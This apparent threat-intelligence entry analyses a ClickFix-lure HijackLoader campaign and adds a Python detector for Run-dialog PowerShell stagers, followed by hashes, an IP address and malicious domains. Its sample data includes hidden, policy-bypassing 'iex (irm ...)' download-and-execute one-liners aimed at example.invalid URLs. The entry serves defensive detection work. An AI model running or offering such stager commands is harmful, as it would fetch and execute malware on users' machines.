Deconstructing a Cyber Deception: An Analysis of the Clickfix HijackLoader Phishing Campaign
Sept. 15, 2025, 6:49 p.m.
Description
This analysis examines the HijackLoader malware campaign, a loader that has gained prominence since 2023 for its payload-delivery and evasion techniques. The intrusion begins with a ClickFix-style lure: a fake CAPTCHA page that tricks the user into running a command, which then progresses through several stages of obfuscated PowerShell scripts. These stages use anti-analysis methods, including anti-VM checks and registry manipulation. The final payload, typically an infostealer such as NekoStealer or Lumma, is delivered through a multi-stage chain of packed .NET executables and protected DLLs. The loader's evolution and its role in the broader malware-as-a-service ecosystem show why defenders should concentrate detection on initial access and the intermediate stages rather than only on the final payload.
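The description's practical point is that detection should target the initial access step and the intermediate PowerShell stages. The following is an added example written for this page, not code from the original article or its authors. It scores process-creation records with Sysmon Event ID 1 style fields for the ClickFix pattern (a script host started directly under explorer.exe, which is how the Run dialog launches its child) and for the command-line traits of obfuscated PowerShell stagers, decoding -EncodedCommand blobs so the inner fetch-and-execute is scored as well. It also parses the Explorer RunMRU registry value, where commands typed into Win+R are recorded, and scores those entries with the same logic. The sample events, the RunMRU dump and the example.invalid URLs are constructed for the demonstration; the pattern list, the weights and the threshold of 3 are assumptions to be tuned against local telemetry.

```python
"""Heuristics for the ClickFix initial-access step and the obfuscated PowerShell
stages that follow it, run over constructed process-creation events and a
constructed RunMRU dump. Example code; not from the original article."""
import base64
import binascii
import re

# Command-line traits shared by ClickFix one-liners and loader stagers (assumed list).
CMDLINE_PATTERNS = {
    "hidden window": re.compile(r"-w(?:indowstyle)?\s+h(?:id(?:den)?)?\b", re.I),
    "execution policy bypass": re.compile(r"-e(?:xecutionpolicy|p)\s+bypass\b", re.I),
    "remote fetch": re.compile(
        r"\b(?:irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring|downloadfile|curl)\b", re.I),
    "dynamic execution": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "inline base64": re.compile(r"\bfrombase64string\b", re.I),
}
ENCODED_ARG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
RUN_DIALOG_PARENTS = {"explorer.exe"}  # Win+R launches its child under explorer.exe


def decode_encoded_command(blob):
    """Decode a PowerShell -EncodedCommand value (base64 over UTF-16LE); None if malformed."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def score_command_line(cmdline, depth=0):
    """Return (score, reasons, decoded_inner). An encoded command is decoded and
    scored recursively so outer obfuscation cannot hide the inner fetch-and-execute."""
    reasons = [name for name, pat in CMDLINE_PATTERNS.items() if pat.search(cmdline)]
    decoded = None
    match = ENCODED_ARG.search(cmdline)
    if match and depth < 3:
        decoded = decode_encoded_command(match.group(1))
        if decoded is not None:
            reasons.append("encoded command")
            _, inner_reasons, _ = score_command_line(decoded, depth + 1)
            reasons.extend("inner: " + r for r in inner_reasons)
    return len(reasons), reasons, decoded


def analyze_event(event):
    """Score one Sysmon Event ID 1 style record (Image, ParentImage, CommandLine, ProcessId)."""
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    parent = event["ParentImage"].rsplit("\\", 1)[-1].lower()
    score, reasons, decoded = score_command_line(event["CommandLine"])
    if image in SCRIPT_HOSTS and parent in RUN_DIALOG_PARENTS:
        # A script host directly under explorer.exe is the Run-dialog path ClickFix relies on.
        reasons.insert(0, "script host spawned by explorer.exe (Run dialog)")
        score += 2  # assumed weight
    return {"pid": event["ProcessId"], "score": score, "reasons": reasons,
            "decoded": decoded, "suspicious": score >= 3}  # assumed threshold


def analyze_events(events):
    return [analyze_event(e) for e in events]


RUNMRU_LINE = re.compile(r"^\s*(\w+)\s+REG_SZ\s+(.*?)\\1\s*$")


def parse_runmru(reg_query_output):
    """Parse 'reg query' output of the Explorer RunMRU key into {value_name: command}.
    Each stored Run-dialog entry ends in a literal backslash-1; MRUList only holds the order."""
    entries = {}
    for line in reg_query_output.splitlines():
        m = RUNMRU_LINE.match(line)
        if m and m.group(1).lower() != "mrulist":
            entries[m.group(1)] = m.group(2)
    return entries


# --- constructed sample input (not captured from the campaign) -----------------------
STAGE1 = "iex (irm 'https://example.invalid/stage2.ps1')"  # hypothetical stager URL
ENC = base64.b64encode(STAGE1.encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    {"ProcessId": 4120, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "powershell.exe -w hidden -ep bypass -enc " + ENC},
    {"ProcessId": 4188, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "powershell.exe -NoProfile -File C:\\Scripts\\inventory.ps1"},
    {"ProcessId": 4230, "Image": "C:\\Windows\\System32\\notepad.exe",
     "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "notepad.exe"},
]
SAMPLE_RUNMRU = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
    a    REG_SZ    powershell -w hidden -ep bypass -c "iex (irm https://example.invalid/a)"\1
    b    REG_SZ    notepad\1
    MRUList    REG_SZ    ab
"""

if __name__ == "__main__":
    for finding in analyze_events(SAMPLE_EVENTS):
        print(finding["pid"], "SUSPICIOUS" if finding["suspicious"] else "benign", finding["reasons"])
        if finding["decoded"]:
            print("   decoded:", finding["decoded"])
    for name, cmd in parse_runmru(SAMPLE_RUNMRU).items():
        print("RunMRU", name, score_command_line(cmd)[:2])
```

The parent-process check is the piece that a command-line regex alone misses: an administrator's encoded command under a terminal and a user pasting a lure into Win+R can look identical on the command line, but only the second arrives as a child of explorer.exe. The RunMRU parser covers hosts without process telemetry, since the Run dialog persists the pasted command in the registry even after the process tree is gone.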
Date
- Created: Sept. 12, 2025, 2:56 p.m.
- Published: Sept. 12, 2025, 2:56 p.m.
- Modified: Sept. 15, 2025, 6:49 p.m.
Indicators
- e2b3c5fdcba20c93cfa695f0abcabe218ac0fc2d7bc72c4c3af84a52d0218a82
- c03eedf04f19fcce9c9b4e5ad1b0f7b69abc4bce7fb551833f37c81acf2c041e
- d0068b92aced77b7a54bd8722ad0fd1037a28821d370cf7e67cbf6fd70a608c4
- 921016a014af73579abc94c891cd5c20c6822f69421f27b24f8e0a044fa10184
- 782b07c9af047cdeda6ba036cfc30c5be8edfbbf0d22f2c110fd0eb1a1a8e57d
- 52273e057552d886effa29cd2e78836e906ca167f65dd8a6b6a6c1708ffdfcfd
- 50258134199482753e9ba3e04d8265d5f64d73a5099f689abcd1c93b5a1b80ee
- 3552b1fded77d4c0ec440f596de12f33be29c5a0b5463fd157c0d27259e5a2df
- 37fc6016eea22ac5692694835dda5e590dc68412ac3a1523ba2792428053fbf4
- 1b272eb601bd48d296995d73f2cdda54ae5f9fa534efc5a6f1dab3e879014b57
- 91.212.166.51
- rs.mezi.bet
- 1h.vuregyy1.ru
- cosi.com.ar